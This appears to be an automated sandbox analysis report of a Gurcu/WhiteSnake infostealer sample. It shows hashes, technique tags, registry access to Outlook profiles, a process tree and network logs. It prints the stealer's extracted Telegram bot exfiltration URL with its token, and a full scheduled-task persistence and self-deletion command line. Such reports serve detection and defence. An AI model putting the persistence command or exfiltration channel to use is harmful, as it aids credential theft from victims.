gurcu | f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50

Analysis

max time kernel
7s
max time network
12s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
30/05/2023, 20:41 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe
Size

490KB
MD5

a338043c6b5260df6b7ce4c4ec3d1b80
SHA1

087a787a34ee05478bfa07b50fd39c8367b0a157
SHA256

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50
SHA512

c81b2f1aac6d249d43b485e8e536c22a8f44da09e31f118f9ddfd0f1ef6d1eba4b67e96d087b2148f45dc93e0de5ba0178c422088e110a40544a7b3b2ff4fccf
SSDEEP

6144:/6ho3IhHN5ya1R64TxT8jWHgf8YJkVHC++VeQPBZnq0LZYSwFxQx9tw39b5wGuJB:irhtHxpmWHgf8Y6/Qp1nLiDKIwf

Score

10^/10

gurcu collection spyware stealer

Malware Config

Extracted

Family

gurcu

https://api.telegram.org/bot6104192483:AAFCcnr4FR2XCO83zUSAWWZ9J3qw4tRYQoI/sendMessage?chat_id=2076277850

Signatures

Gurcu, WhiteSnake
Gurcu is a malware stealer written in C#.
stealer gurcu

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2548970870-3691742953-3895070203-1000\Control Panel\International\Geo\Nation	f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

Executes dropped EXE 1 IoCs

pid	Process
112	f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Accesses Microsoft Outlook profiles 1 TTPs 2 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2548970870-3691742953-3895070203-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe
Key opened	\REGISTRY\USER\S-1-5-21-2548970870-3691742953-3895070203-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
348	schtasks.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2288	PING.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
112	f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	372	f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe
Token: SeDebugPrivilege	112	f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 372 wrote to memory of 1552	372	f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe	84
PID 372 wrote to memory of 1552	372	f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe	84
PID 1552 wrote to memory of 4700	1552	cmd.exe	86
PID 1552 wrote to memory of 4700	1552	cmd.exe	86
PID 1552 wrote to memory of 2288	1552	cmd.exe	87
PID 1552 wrote to memory of 2288	1552	cmd.exe	87
PID 1552 wrote to memory of 348	1552	cmd.exe	88
PID 1552 wrote to memory of 348	1552	cmd.exe	88
PID 1552 wrote to memory of 112	1552	cmd.exe	89
PID 1552 wrote to memory of 112	1552	cmd.exe	89

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2548970870-3691742953-3895070203-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2548970870-3691742953-3895070203-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

C:\Users\Admin\AppData\Local\Temp\f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe
"C:\Users\Admin\AppData\Local\Temp\f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe"
1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:372
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\EsetSecurity\f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe" &&START "" "C:\Users\Admin\AppData\Local\EsetSecurity\f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1552
- - C:\Windows\system32\chcp.com
    chcp 65001
    3⤵
    PID:4700
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:2288
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn "f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\EsetSecurity\f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe" /rl HIGHEST /f
    3⤵
    - Creates scheduled task(s)
    PID:348
- - C:\Users\Admin\AppData\Local\EsetSecurity\f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe
    "C:\Users\Admin\AppData\Local\EsetSecurity\f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe"
    3⤵
    - Executes dropped EXE
    - Accesses Microsoft Outlook profiles
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - outlook_office_path
    - outlook_win_path
    PID:112

Network

DNS

twitter.com

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

Remote address:

8.8.8.8:53

Request

twitter.com

IN A

Response

twitter.com

IN A

104.244.42.65

twitter.com

IN A

104.244.42.193

twitter.com

IN A

104.244.42.1

twitter.com

IN A

104.244.42.129
DNS

28.118.140.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

28.118.140.52.in-addr.arpa

IN PTR

Response
DNS

cybereason.com

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

Remote address:

8.8.8.8:53

Request

cybereason.com

IN A

Response

cybereason.com

IN A

45.60.107.106

cybereason.com

IN A

45.60.62.106
DNS

archive.torproject.org

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

Remote address:

8.8.8.8:53

Request

archive.torproject.org

IN A

Response

archive.torproject.org

IN CNAME

archive-01.torproject.org

archive-01.torproject.org

IN A

159.69.63.226
DNS

youtube.kz

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

Remote address:

8.8.8.8:53

Request

youtube.kz

IN A

Response

youtube.kz

IN A

142.251.39.110
DNS

google.kz

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

Remote address:

8.8.8.8:53

Request

google.kz

IN A

Response

google.kz

IN A

142.250.179.132
GET

http://cybereason.com/f7XILP3iv4?s=144

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

Remote address:

45.60.107.106:80

Request

GET /f7XILP3iv4?s=144 HTTP/1.1
Host: cybereason.com
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Location: http://www.cybereason.com/f7XILP3iv4?s=144
Content-Length: 0
Connection: close
GET

http://cybereason.com/oQJb3GUymA?s=13

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

Remote address:

45.60.107.106:80

Request

GET /oQJb3GUymA?s=13 HTTP/1.1
Host: cybereason.com
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Location: http://www.cybereason.com/oQJb3GUymA?s=13
Content-Length: 0
Connection: close
POST

http://youtube.kz/G4XvFNPg1L?27=1

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

Remote address:

142.251.39.110:80

Request

POST /G4XvFNPg1L?27=1 HTTP/1.1
Host: youtube.kz
Content-Length: 27
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 400 Bad Request

Content-Type: text/html; charset=utf-8
X-Content-Type-Options: nosniff
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Tue, 30 May 2023 20:42:12 GMT
Server: ESF
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
POST

http://youtube.kz/G4XvFNPg1L?27=1

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

Remote address:

142.251.39.110:80

Request

POST /G4XvFNPg1L?27=1 HTTP/1.1
Host: youtube.kz
Content-Length: 27
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 400 Bad Request

Content-Type: text/html; charset=utf-8
X-Content-Type-Options: nosniff
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Tue, 30 May 2023 20:42:12 GMT
Server: ESF
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
GET

http://google.kz/CNhPDG057N?s=89

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

Remote address:

142.250.179.132:80

Request

GET /CNhPDG057N?s=89 HTTP/1.1
Host: google.kz
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1571
Date: Tue, 30 May 2023 20:42:12 GMT
GET

https://archive.torproject.org/tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

Remote address:

159.69.63.226:443

Request

GET /tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz HTTP/1.1
Host: archive.torproject.org
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Tue, 30 May 2023 20:42:13 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://uy3qxvwzwoeztnellvvhxh7ju7kfvlsauka7avilcjg7domzxptbq7qd.onion/tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz
Last-Modified: Thu, 16 Mar 2023 15:33:36 GMT
ETag: "d42801-5f7062f2cbbbf"
Accept-Ranges: bytes
Content-Length: 13903873
Cache-Control: max-age=2592000
Expires: Thu, 29 Jun 2023 20:42:13 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-gzip
Content-Language: en
POST

http://twitter.com/AVHwxwUtwJ?185=0

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

Remote address:

104.244.42.65:80

Request

POST /AVHwxwUtwJ?185=0 HTTP/1.1
Host: twitter.com
Content-Length: 185
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

perf: 7626143928
location: https://twitter.com/AVHwxwUtwJ?185=0
cache-control: no-cache, no-store, max-age=0
content-length: 0
x-transaction-id: 11d09a394a0f420a
x-response-time: 99
x-connection-hash: ca71cde3565e11320cb169c0bfd56a9b3ac394eb7139e5e539eadbc12bdd8065
date: Tue, 30 May 2023 20:42:11 GMT
server: tsa_o
GET

http://twitter.com/0My2dPrz2a?s=27

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

Remote address:

104.244.42.65:80

Request

GET /0My2dPrz2a?s=27 HTTP/1.1
Host: twitter.com

Response

HTTP/1.1 301 Moved Permanently

perf: 7626143928
location: https://twitter.com/0My2dPrz2a?s=27
cache-control: no-cache, no-store, max-age=0
content-length: 0
x-transaction-id: fbbd78eed4f86d26
x-response-time: 98
x-connection-hash: ca71cde3565e11320cb169c0bfd56a9b3ac394eb7139e5e539eadbc12bdd8065
date: Tue, 30 May 2023 20:42:12 GMT
server: tsa_o
GET

http://cybereason.com/de2GhgMoGn?s=144

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

Remote address:

45.60.107.106:80

Request

GET /de2GhgMoGn?s=144 HTTP/1.1
Host: cybereason.com

Response

HTTP/1.1 301 Moved Permanently

Location: http://www.cybereason.com/de2GhgMoGn?s=144
Content-Length: 0
Connection: close
GET

http://twitter.com/0My2dPrz2a?s=27

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

Remote address:

104.244.42.65:80

Request

GET /0My2dPrz2a?s=27 HTTP/1.1
Host: twitter.com

Response

HTTP/1.1 301 Moved Permanently

perf: 7626143928
location: https://twitter.com/0My2dPrz2a?s=27
cache-control: no-cache, no-store, max-age=0
content-length: 0
x-transaction-id: d332bc37cf649f5a
x-response-time: 99
x-connection-hash: 60627c143e6d9d49e60211385260d22f504a67175ebb3fc68734a0dab0acf4ae
date: Tue, 30 May 2023 20:42:11 GMT
server: tsa_o
GET

http://twitter.com/0My2dPrz2a?s=27

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

Remote address:

104.244.42.65:80

Request

GET /0My2dPrz2a?s=27 HTTP/1.1
Host: twitter.com

Response

HTTP/1.1 301 Moved Permanently

perf: 7626143928
location: https://twitter.com/0My2dPrz2a?s=27
cache-control: no-cache, no-store, max-age=0
content-length: 0
x-transaction-id: 80074e4cb469bada
x-response-time: 105
x-connection-hash: 60627c143e6d9d49e60211385260d22f504a67175ebb3fc68734a0dab0acf4ae
date: Tue, 30 May 2023 20:42:12 GMT
server: tsa_o
DNS

www.cybereason.com

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

Remote address:

8.8.8.8:53

Request

www.cybereason.com

IN A

Response

www.cybereason.com

IN CNAME

4amkvb7.impervadns.net

4amkvb7.impervadns.net

IN A

45.60.66.106
GET

https://twitter.com/AVHwxwUtwJ?185=0

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

Remote address:

104.244.42.65:443

Request

GET /AVHwxwUtwJ?185=0 HTTP/1.1
Host: twitter.com
Connection: Keep-Alive

Response

HTTP/1.1 302 Found

date: Tue, 30 May 2023 20:42:13 GMT
perf: 7626143928
vary: Accept
server: tsa_o
location: /AVHwxwUtwJ?185=0
set-cookie: guest_id=v1%3A168547933329818778; Max-Age=34214400; Expires=Sat, 29 Jun 2024 20:42:13 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
content-type: text/plain; charset=utf-8
x-powered-by: Express
cache-control: no-cache, no-store, max-age=0
content-length: 39
x-transaction-id: cea4d97cb401f0ce
strict-transport-security: max-age=631138519
x-response-time: 117
x-connection-hash: b00cb82bde84ebf73c70c50ee62d60c9f54f6c38e0a4761133e590202f02b688
GET

https://twitter.com/0My2dPrz2a?s=27

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

Remote address:

104.244.42.65:443

Request

GET /0My2dPrz2a?s=27 HTTP/1.1
Host: twitter.com

Response

HTTP/1.1 302 Found

date: Tue, 30 May 2023 20:42:13 GMT
perf: 7626143928
vary: Accept
server: tsa_o
location: /0My2dPrz2a?s=27
set-cookie: guest_id=v1%3A168547933367845331; Max-Age=34214400; Expires=Sat, 29 Jun 2024 20:42:13 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
content-type: text/plain; charset=utf-8
x-powered-by: Express
cache-control: no-cache, no-store, max-age=0
content-length: 38
x-transaction-id: e0ab50842840ee08
strict-transport-security: max-age=631138519
x-response-time: 114
x-connection-hash: b00cb82bde84ebf73c70c50ee62d60c9f54f6c38e0a4761133e590202f02b688
GET

https://twitter.com/AVHwxwUtwJ?185=0

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

Remote address:

104.244.42.65:443

Request

GET /AVHwxwUtwJ?185=0 HTTP/1.1
Host: twitter.com

Response

HTTP/1.1 302 Found

date: Tue, 30 May 2023 20:42:13 GMT
perf: 7626143928
vary: Accept
server: tsa_o
location: /AVHwxwUtwJ?185=0
set-cookie: guest_id=v1%3A168547933379800132; Max-Age=34214400; Expires=Sat, 29 Jun 2024 20:42:13 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
content-type: text/plain; charset=utf-8
x-powered-by: Express
cache-control: no-cache, no-store, max-age=0
content-length: 39
x-transaction-id: 8c23fba85175d8b0
strict-transport-security: max-age=631138519
x-response-time: 121
x-connection-hash: b00cb82bde84ebf73c70c50ee62d60c9f54f6c38e0a4761133e590202f02b688
GET

http://www.cybereason.com/f7XILP3iv4?s=144

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

Remote address:

45.60.66.106:80

Request

GET /f7XILP3iv4?s=144 HTTP/1.1
Host: www.cybereason.com
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Date: Tue, 30 May 2023 20:42:12 GMT
Content-Length: 0
Connection: keep-alive
Location: https://www.cybereason.com/f7XILP3iv4?s=144
Cache-Control: s-maxage=3600,max-age=120
X-Hs-Https-Only: worker
Set-Cookie: __cf_bm=ewOnaZulmWmLLHOqf_4Qzz2yxIMNZuvjzIdBQt_AV4A-1685479332-0-Af17/+ifDnf6udUJvpSTSvWIuwZj6b+36spTlIF/c7tZNGR+nSk3d2ILcbyQMDqDxM9t6TRKdRF1WMKGFwnihRQ=; path=/; expires=Tue, 30-May-23 21:12:12 GMT; domain=.www.cybereason.com; HttpOnly
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ACGs2Haa9lgKtbLRENI9sw0UBYlhb8q3lypS%2B3szrYiCIXtX%2BeFoYrMddaBSEcp3xgPT8ctS7DdOq%2BtplgD4Ut%2FfC%2BMZiBi37ldNpp%2Fa%2B4imu1NSDI2qkrZ1IjukFTzrdJoDow%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
Set-Cookie: __cfruid=fca4ca446f98db1bff189ed4a65d9fdd6d07ba27-1685479332; path=/; domain=.www.cybereason.com; HttpOnly
Server: cloudflare
CF-RAY: 7cf9cd638b3eb7b2-AMS
alt-svc: h3=":443"; ma=86400
Set-Cookie: visid_incap_2710048=3ntYNkhLRfCHliJ7QY9gO6NfdmQAAAAAQUIPAAAAAAAFV3Y3ewyLcrqZA1ef8RKL; expires=Tue, 28 May 2024 22:36:45 GMT; HttpOnly; path=/; Domain=.cybereason.com
Set-Cookie: nlbi_2710048=InZBU57JuS45cRgn2P/mMAAAAABwxYEBW4/mJKslKyg7coeS; path=/; Domain=.cybereason.com
Set-Cookie: incap_ses_451_2710048=6x6lUlExURwC7chyDkdCBqNfdmQAAAAAq4XWkS0Y6n2hcyEgtBvlJw==; path=/; Domain=.cybereason.com
X-CDN: Imperva
X-Iinfo: 9-29743120-29743145 NNNN CT(6 -1 0) RT(1685479331754 93) q(0 0 0 -1) r(0 0) U11
GET

http://www.cybereason.com/oQJb3GUymA?s=13

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

Remote address:

45.60.66.106:80

Request

GET /oQJb3GUymA?s=13 HTTP/1.1
Host: www.cybereason.com
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Date: Tue, 30 May 2023 20:42:12 GMT
Content-Length: 0
Connection: keep-alive
Location: https://www.cybereason.com/oQJb3GUymA?s=13
Cache-Control: s-maxage=3600,max-age=120
X-Hs-Https-Only: worker
Set-Cookie: __cf_bm=1tgp3y9YjKZX6h0pNi_kGiiwi6KZsH5vVH_MuIbvW0M-1685479332-0-AUEX4rrUOBq7fINbpyKwtz6yPhtVTCS4Yj/e0ucUzTulHrzEVMc+CX6Qv1AgpfYC0fleyhNqh3HZwamgB1JRkQM=; path=/; expires=Tue, 30-May-23 21:12:12 GMT; domain=.www.cybereason.com; HttpOnly
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jl4Oaup8FPr50r3SlV5bPZpLFrXcueFYqPoAQK%2FOqJLtdXEN5sSbdfIsMSN9IxFPnFyx1LXZFkXLGOb26ATU3vQZrnmYEkUIAv5AHhXK7vftB6VXDv%2BkqIxr5StuHTUhhsKX%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
Set-Cookie: __cfruid=fca4ca446f98db1bff189ed4a65d9fdd6d07ba27-1685479332; path=/; domain=.www.cybereason.com; HttpOnly
Server: cloudflare
CF-RAY: 7cf9cd634c0e0b7f-AMS
alt-svc: h3=":443"; ma=86400
Set-Cookie: visid_incap_2710048=9d03kXbFSISpaK1Q7cTcxaNfdmQAAAAAQUIPAAAAAABxm1OYF7b/qshOkLdjmbhY; expires=Tue, 28 May 2024 22:36:45 GMT; HttpOnly; path=/; Domain=.cybereason.com
Set-Cookie: nlbi_2710048=Egi9WVGmOlBtsxOE2P/mMAAAAAB8zNyiaauRau5cwxscD1ax; path=/; Domain=.cybereason.com
Set-Cookie: incap_ses_451_2710048=zZV1cpjFAEzX7MhyDkdCBqNfdmQAAAAAx/25RrZbOoLL0/JyNyl/KQ==; path=/; Domain=.cybereason.com
X-CDN: Imperva
X-Iinfo: 10-43120905-43120915 NNNN CT(1 -1 0) RT(1685479331774 36) q(0 0 0 1) r(0 0) U11
GET

http://www.cybereason.com/de2GhgMoGn?s=144

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

Remote address:

45.60.66.106:80

Request

GET /de2GhgMoGn?s=144 HTTP/1.1
Host: www.cybereason.com

Response

HTTP/1.1 301 Moved Permanently

Date: Tue, 30 May 2023 20:42:12 GMT
Content-Length: 0
Connection: keep-alive
Location: https://www.cybereason.com/de2GhgMoGn?s=144
Cache-Control: s-maxage=3600,max-age=120
X-Hs-Https-Only: worker
Set-Cookie: __cf_bm=9DBSw6Vb.w7CvhitmerUfuuNlp7t_VPoJuw3tFfBOoI-1685479332-0-AefrVxQQeJaGtrMQxM2oOsTcAAERNoyi8hV1YM9NVGLNGx2xwt3PjiWTncfDHxvUEZNsfdZe9Bw2oOjEHovnzIE=; path=/; expires=Tue, 30-May-23 21:12:12 GMT; domain=.www.cybereason.com; HttpOnly
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dbCYNGfnFW02qCIzJm%2FMq%2BoBdzq9XdksJtuAOxiIhd%2FbyUNxIYa%2BScUJkp2%2BIE%2FnmEbgWvNYijBvr4u0ryF13xyZlMWCMOl0QqfNwYbhZZYpnpBjV%2Bz1On9BDqbMak%2FNfeI6gA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
Set-Cookie: __cfruid=fca4ca446f98db1bff189ed4a65d9fdd6d07ba27-1685479332; path=/; domain=.www.cybereason.com; HttpOnly
Server: cloudflare
CF-RAY: 7cf9cd65e8cf0b7f-AMS
alt-svc: h3=":443"; ma=86400
Set-Cookie: visid_incap_2710048=UKXupyxdTQezNtg9PIlTu6RfdmQAAAAAQUIPAAAAAACNnmt9OlxqGWM1L28aLznH; expires=Tue, 28 May 2024 22:36:45 GMT; HttpOnly; path=/; Domain=.cybereason.com
Set-Cookie: incap_ses_451_2710048=rGICOtYSJ2GA7chyDkdCBqRfdmQAAAAA1fwL6TE8YU9HzniSKUk2WQ==; path=/; Domain=.cybereason.com
X-CDN: Imperva
X-Iinfo: 10-43120905-43120915 SNNN RT(1685479331774 466) q(0 0 0 -1) r(0 0) U11
DNS

23.159.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

23.159.190.20.in-addr.arpa

IN PTR

Response
DNS

110.39.251.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

110.39.251.142.in-addr.arpa

IN PTR

Response

110.39.251.142.in-addr.arpa

IN PTR

ams15s48-in-f141e100net
DNS

132.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

132.179.250.142.in-addr.arpa

IN PTR

Response

132.179.250.142.in-addr.arpa

IN PTR

ams17s10-in-f41e100net
DNS

106.107.60.45.in-addr.arpa

Remote address:

8.8.8.8:53

Request

106.107.60.45.in-addr.arpa

IN PTR

Response
DNS

65.42.244.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

65.42.244.104.in-addr.arpa

IN PTR

Response
DNS

226.63.69.159.in-addr.arpa

Remote address:

8.8.8.8:53

Request

226.63.69.159.in-addr.arpa

IN PTR

Response

226.63.69.159.in-addr.arpa

IN PTR

archive-01 torprojectorg
GET

https://twitter.com/0My2dPrz2a?s=27

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

Remote address:

104.244.42.65:443

Request

GET /0My2dPrz2a?s=27 HTTP/1.1
Host: twitter.com
Connection: Keep-Alive

Response

HTTP/1.1 302 Found

date: Tue, 30 May 2023 20:42:13 GMT
perf: 7626143928
vary: Accept
server: tsa_o
location: /0My2dPrz2a?s=27
set-cookie: guest_id=v1%3A168547933317049256; Max-Age=34214400; Expires=Sat, 29 Jun 2024 20:42:13 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
content-type: text/plain; charset=utf-8
x-powered-by: Express
cache-control: no-cache, no-store, max-age=0
content-length: 38
x-transaction-id: 7b20cc77e380792c
strict-transport-security: max-age=631138519
x-response-time: 102
x-connection-hash: 52de1709fc42a2404092e39a3937678ac589ba669d1f9e82674802e17001bfd4
GET

https://twitter.com/0My2dPrz2a?s=27

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

Remote address:

104.244.42.65:443

Request

GET /0My2dPrz2a?s=27 HTTP/1.1
Host: twitter.com

Response

HTTP/1.1 302 Found

date: Tue, 30 May 2023 20:42:13 GMT
perf: 7626143928
vary: Accept
server: tsa_o
location: /0My2dPrz2a?s=27
set-cookie: guest_id=v1%3A168547933331842633; Max-Age=34214400; Expires=Sat, 29 Jun 2024 20:42:13 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
content-type: text/plain; charset=utf-8
x-powered-by: Express
cache-control: no-cache, no-store, max-age=0
content-length: 38
x-transaction-id: c0835f73c04bf086
strict-transport-security: max-age=631138519
x-response-time: 111
x-connection-hash: 52de1709fc42a2404092e39a3937678ac589ba669d1f9e82674802e17001bfd4
GET

https://twitter.com/0My2dPrz2a?s=27

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

Remote address:

104.244.42.65:443

Request

GET /0My2dPrz2a?s=27 HTTP/1.1
Host: twitter.com

Response

HTTP/1.1 302 Found

date: Tue, 30 May 2023 20:42:13 GMT
perf: 7626143928
vary: Accept
server: tsa_o
location: /0My2dPrz2a?s=27
set-cookie: guest_id=v1%3A168547933342898442; Max-Age=34214400; Expires=Sat, 29 Jun 2024 20:42:13 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
content-type: text/plain; charset=utf-8
x-powered-by: Express
cache-control: no-cache, no-store, max-age=0
content-length: 38
x-transaction-id: 1fd6343b732f1ddf
strict-transport-security: max-age=631138519
x-response-time: 112
x-connection-hash: 52de1709fc42a2404092e39a3937678ac589ba669d1f9e82674802e17001bfd4
GET

https://twitter.com/0My2dPrz2a?s=27

f7b02278a2310a2657dcca702188af461ce8450dc0c5bced802773ca8eab6f50.exe

Remote address:

104.244.42.65:443

Request

GET /0My2dPrz2a?s=27 HTTP/1.1
Host: twitter.com

Response

HTTP/1.1 302 Found

date: Tue, 30 May 2023 20:42:13 GMT
perf: 7626143928
vary: Accept
server: tsa_o
location: /0My2dPrz2a?s=27
